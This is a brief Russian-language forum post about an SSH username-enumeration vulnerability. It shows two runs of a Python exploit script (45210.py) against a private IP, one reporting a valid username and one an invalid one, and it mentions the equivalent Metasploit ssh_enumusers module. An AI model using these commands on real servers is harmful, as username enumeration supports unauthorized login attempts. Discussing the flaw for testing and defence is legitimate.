Очень мало ознакомился с данной уязвимостью, надеюсь мне помогут и знающие люди допишут полезной инфы в комментах.
Скрипт на питоне по адресу Exploit позволяет перечислять имена пользователей.
Пример с правельным username
└──╼ $python2.7 45210.py --port 22 192.168.1.2 root
[+] Valid username
Не правильный
└──╼ $python2.7 45210.py --port 22 192.168.1.2 admin[*] Invalid username
Так и не понял суматохи по поводу этой уязвимости, ведь есть auxiliary(scanner/ssh/ssh_enumusers) которая , также помогает узнать username